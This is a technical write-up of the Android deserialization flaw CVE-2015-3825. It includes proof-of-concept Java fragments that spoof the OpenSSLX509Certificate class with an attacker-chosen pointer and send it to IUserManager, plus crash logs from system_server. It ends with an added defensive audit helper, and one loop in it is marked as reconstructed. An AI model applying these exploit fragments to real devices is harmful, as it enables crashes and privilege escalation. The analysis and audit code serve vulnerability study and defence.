OpenSSLX509Certificate deserialization vulnerability (CVE-2015-3825) cause analysis

2015-11-10T00:00:00
ID MYHACK58:62201568820
Type myhack58
Reporter Anonymous
Modified 2015-11-10T00:00:00

Description

Serialization is the process of converting an object's state into a form that can be stored or transmitted. During serialization the object's current state is written to a temporary or persistent storage area; a user can later read it back from that area, that is, deserialize it, to re-create the object. Android uses serialization for data transfer in many places, such as passing objects between or within apps and carrying data over Binder communication, and this generally crosses process and permission boundaries. Serialization and deserialization are therefore another input to a program or interface: the contents of the storage area or the byte sequence can be filled arbitrarily, and if they are not fully validated when used, security vulnerabilities result. On Android, serialization/deserialization vulnerabilities have been used for denial of service against apps, privilege escalation and other attacks.

0x01 Vulnerability cause

This Android serialization vulnerability (CVE-2015-3825) affects Android 4.3 through Android 5.1, that is, Jelly Bean, KitKat, Lollipop and the Android M preview 1, reaching 55% of Android devices. On an affected device it can be used to obtain system permissions, which means an attacker can replace a target app's APK and thereby take over any application on the victim's phone. The vulnerability was found by the IBM security researchers Or Peles and Roee Hay and presented at USENIX 2015 under the title "One Class to Rule Them All: 0-Day Deserialization Vulnerabilities in Android" [1].

2.1 PoC configuration

The paper's authors released neither an exploit nor a PoC, but from the paper we know that the vulnerability lies in the class OpenSSLX509Certificate, full package path com.android.org.conscrypt.OpenSSLX509Certificate. This class satisfies three conditions: 1) OpenSSLX509Certificate is serializable, because it inherits from the serializable Certificate class; 2) it has a finalize() method that calls a native method in libjavascrypto.so, passing the field mContext, which is declared as a long but is really a pointer; 3) OpenSSLX509Certificate does not implement its own deserialization methods readObject and readResolve. So mContext is the pointer we were looking for that an attacker may be able to control.

I reworked the CVE-2014-7911 PoC. First, define a class com.android.org.conscrypt.ApenSSLX509Certificate as follows:

    package com.android.org.conscrypt;

    import java.io.Serializable;

    public class ApenSSLX509Certificate implements Serializable {
        // the serialVersionUID has to match the OpenSSLX509Certificate of the target build
        //private static final long serialVersionUID = -5454153458060784251L; // android 4.4.2 emulator
        private static final long serialVersionUID = -8550350185014308538L; // android 5.1.1 emulator
        public final long mContext;

        ApenSSLX509Certificate(long ctx) {
            mContext = ctx;
        }
    }

Note that the package is named com.android.org.conscrypt. Then create a MainActivity.java under the same package name that uses ApenSSLX509Certificate (b is the Bundle carried by the request):

    com.android.org.conscrypt.ApenSSLX509Certificate evilProxy =
            new com.android.org.conscrypt.ApenSSLX509Certificate(0x7f7f7f7f7f7f7f7fL);
    b.putSerializable("eatthis", evilProxy);

And before the CVE-2014-7911 PoC sends its request to the "android.os.IUserManager" service, rewrite the class name inside the serialized bytes:

    int l = data.length;
    // loop bound reconstructed: the comparison was lost in the extracted text
    for (int i = 0; i < l - 4; i++) {
        // turn "Apen..." into "Open..." so the receiver resolves the real OpenSSLX509Certificate
        if (data[i] == 'A' && data[i+1] == 'p' && data[i+2] == 'e' && data[i+3] == 'n') {
            data[i] = 'O';
            break;
        }
    }

As in the CVE-2014-7911 analysis, we also add some log output to services.jar. On the Android 4.4.2 AVD, after installing and running the PoC, we see:

    E/CVE-2014-7911-trace(1669): setApplicationRestrictions
    E/CVE-2014-7911-trace(1669): writeApplicationRestrictionsLocked
    E/CVE-2014-7911-trace(1669): writeApplicationRestrictionsLocked::for::eatthis
    E/CVE-2014-7911-trace(1669): writeApplicationRestrictionsLocked::for::else
    E/CVE-2014-7911-trace(1669): writeApplicationRestrictionsLocked::Exception
    E/CVE-2014-7911-trace(1669): writeApplicationRestrictionsLocked::Exception::java.lang.ClassCastException: com.android.org.conscrypt.OpenSSLX509Certificate cannot be cast to java.lang.String[]
    W/System.err(1669): java.lang.ClassCastException: com.android.org.conscrypt.OpenSSLX509Certificate cannot be cast to java.lang.String[]
        at com.android.server.pm.UserManagerService.writeApplicationRestrictionsLocked(UserManagerService.java:1417)
        at com.android.server.pm.UserManagerService.setApplicationRestrictions(UserManagerService.java:1124)
        at android.os.IUserManager$Stub.onTransact(IUserManager.java:245)
    W/System.err(1669): at android.os.Binder.execTransact(Binder.java:404)
    W/System.err(1669): at dalvik.system.NativeStart.run(Native Method)
    E/UserManagerService(1669): Error writing application restrictions list

This is also an exception caused by a forced type cast, but it differs from CVE-2014-7911, where the cast to java.io.Serializable failed because the incoming object itself was not a serialized object. In CVE-2015-3825 the exception comes from casting com.android.org.conscrypt.OpenSSLX509Certificate to java.lang.String[]. When verifying the PoC on the Android 4.4.2 AVD, the "Error writing application restrictions list" error is triggered, but garbage collection, and with it the finalizer, is not.

On the Android 5.1.1 AVD, repeatedly sending the TRANSACTION_setApplicationRestrictions request n times does trigger garbage collection and finally crashes system_server:

    A/libc(4839): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x7f7f7f8f in tid 4848 (FinalizerDaemon)
    I/DEBUG(61):
    I/DEBUG(61): Build fingerprint: 'generic/sdk_phone_armv7/generic:5.1/LKY45/1737576:eng/test-keys'
    I/DEBUG(61): Revision: '0'
    I/DEBUG(61): ABI: 'arm'
    I/DEBUG(61): pid: 4839, tid: 4848, name: FinalizerDaemon  >>> system_server
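As an added audit helper (my code, not from the original post or from the conscrypt project), the following applies the three conditions from the vulnerability-cause section above to any loaded class via reflection, and puts a hardened shape next to the vulnerable one: the native handle is transient and readObject rejects the stream, so the value a finalizer hands to native code can never come from an untrusted stream. The class names FinalizerHandleAudit, UnguardedHandle and GuardedHandle are hypothetical.

```java
import java.io.*;
import java.lang.reflect.*;
import java.util.*;

// Added audit helper (not from the original post): flags the three-condition pattern above.
public final class FinalizerHandleAudit {
    static boolean declares(Class<?> c, String name, Class<?>... params) {
        try { c.getDeclaredMethod(name, params); return true; }
        catch (NoSuchMethodException e) { return false; }
    }

    // Non-static, non-transient long fields in the hierarchy: restored straight from the
    // stream without passing through any constructor, so their value is caller-chosen.
    static List<String> unguardedLongFields(Class<?> c) {
        List<String> out = new ArrayList<>();
        for (Class<?> k = c; k != null && k != Object.class; k = k.getSuperclass())
            for (Field f : k.getDeclaredFields()) {
                int m = f.getModifiers();
                if (f.getType() == long.class && !Modifier.isStatic(m) && !Modifier.isTransient(m))
                    out.add(k.getSimpleName() + "." + f.getName());
            }
        return out;
    }

    // Empty list when the class does not match; otherwise one line per matched condition.
    public static List<String> audit(Class<?> c) {
        List<String> findings = new ArrayList<>();
        if (!Serializable.class.isAssignableFrom(c) || !declares(c, "finalize")) return findings;
        List<String> handles = unguardedLongFields(c);
        if (handles.isEmpty()) return findings;
        findings.add(c.getName() + ": Serializable, declares finalize(), long field(s) " + handles);
        if (!declares(c, "readObject", ObjectInputStream.class) && !declares(c, "readResolve"))
            findings.add("no readObject/readResolve: deserialized value reaches finalize() unchecked");
        return findings;
    }

    // Constructed sample of the vulnerable shape (hypothetical, not conscrypt's code).
    static class UnguardedHandle implements Serializable {
        private static final long serialVersionUID = 1L;
        long mContext;
        @Override protected void finalize() { /* would hand mContext to native code */ }
    }

    // Hardened shape: the handle is transient (deserializes as 0) and readObject rejects
    // the stream, so finalize() can never see a value chosen by the sender of the stream.
    static class GuardedHandle implements Serializable {
        private static final long serialVersionUID = 1L;
        transient long mContext;
        private void readObject(ObjectInputStream in) throws IOException { throw new InvalidObjectException("native handles must not be deserialized"); }
        @Override protected void finalize() { /* would hand mContext to native code */ }
    }
}
```

Calling audit(UnguardedHandle.class) reports both the handle field and the missing readObject/readResolve, while audit(GuardedHandle.class) reports nothing because the transient field is skipped.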
